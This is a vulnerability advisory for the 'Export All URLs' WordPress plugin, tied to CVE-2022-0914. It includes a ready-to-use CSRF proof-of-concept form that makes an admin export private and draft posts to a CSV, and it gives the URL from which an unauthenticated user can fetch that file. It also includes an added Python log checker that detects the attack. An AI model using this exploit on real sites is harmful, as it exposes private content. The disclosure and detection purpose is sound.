During security research I found a CSRF vulnerability. The name of the plugin is Export All URLs; the affected versions are < 4.3.


The plugin does not have CSRF checks in place when exporting data, which could allow attackers to make a logged-in admin export all posts and pages (including private and draft) into an arbitrary CSV file, which the attacker can then download to retrieve, for example, the list of titles.


Make a logged-in admin open:

    <form action="https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" method="POST">
      <input type="hidden" name="post-type" value="any" />
      <input type="hidden" name="additional-data[]" value="title" />
      <input type="hidden" name="post-status" value="all" />
      <input type="hidden" name="posts-from" value="" />
      <input type="hidden" name="posts-upto" value="" />
      <input type="hidden" name="post-author" value="all" />
      <input type="hidden" name="number-of-posts" value="all" />
      <input type="hidden" name="starting-point" value="" />
      <input type="hidden" name="ending-point" value="" />
      <input type="hidden" name="csv-file-name" value="via-csrf" />
      <input type="hidden" name="export-type" value="text" />
      <input type="hidden" name="export" value="Export Now" />
      <input type="submit" value="Submit request" />
    </form>

Then open https://example.com/wp-content/uploads/2022/03/via-csrf.CSV as an unauthenticated user
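A log check built from the two requests above, added here as an example and not part of the original advisory or the plugin's code: it flags export POSTs whose Referer is not the site itself, and exported CSV files fetched by a client that never submitted an export. It assumes a combined-format access log; `SITE_HOST`, `find_suspicious` and the sample lines are hypothetical names and constructed data.

```python
import re
from urllib.parse import urlsplit

SITE_HOST = "example.com"  # assumption: the site's own hostname
EXPORT_PATH = "/wp-admin/tools.php?page=extract-all-urls-settings"  # from the PoC form
# Combined log format: ip, ident, user, [time], "request", status, size, "referer", "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)
# Exported files land in the uploads directory (year/month folders are optional).
CSV_RE = re.compile(r"^/wp-content/uploads/(?:\d{4}/\d{2}/)?[^/]+\.csv$", re.I)

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.10 - - [14/Mar/2022:10:00:01 +0000] "POST /wp-admin/tools.php?page=extract-all-urls-settings HTTP/1.1" 200 5120 "https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" "Mozilla/5.0"',
    '203.0.113.10 - - [14/Mar/2022:10:05:00 +0000] "POST /wp-admin/tools.php?page=extract-all-urls-settings HTTP/1.1" 200 5120 "https://other.example.net/page.html" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Mar/2022:10:05:30 +0000] "GET /wp-content/uploads/2022/03/via-csrf.CSV HTTP/1.1" 200 2048 "-" "curl/7.81.0"',
]

def find_suspicious(lines, site_host=SITE_HOST):
    """Return (line_number, reason, client_ip) tuples for requests worth reviewing."""
    findings, export_ips = [], set()
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m["ip"], m["path"]
        if m["method"] == "POST" and path.startswith(EXPORT_PATH):
            export_ips.add(ip)
            # A genuine export is submitted from the plugin's own settings page,
            # so a missing or foreign Referer host is the CSRF indicator.
            if urlsplit(m["referer"]).hostname != site_host:
                findings.append((n, "cross-site-export", ip))
        elif m["method"] == "GET" and m["status"] == "200" and CSV_RE.match(path):
            # Export file fetched by a client that never requested an export.
            if export_ips and ip not in export_ips:
                findings.append((n, "csv-fetched-by-other-client", ip))
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

Browsers or proxies that strip the Referer header will also trigger the first rule, so treat hits as leads to review rather than confirmed abuse.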

Additional information

WPScan link: https://wpscan.com/vulnerability/c328be28-75dd-43db-a5b9-c1ba0636c930


NIST link: https://nvd.nist.gov/vuln/detail/CVE-2022-0914

The plugin has more than 30,000 active installations.